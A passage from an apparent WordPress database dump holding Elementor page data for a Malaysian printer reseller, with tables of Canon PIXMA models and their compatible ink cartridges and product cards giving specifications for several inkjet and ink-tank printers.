width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7031,3318,'_wp_page_template','template-fullwidth.php'),(7032,3318,'_elementor_edit_mode','builder'),(7033,3318,'_elementor_template_type','post'),(7034,3318,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA 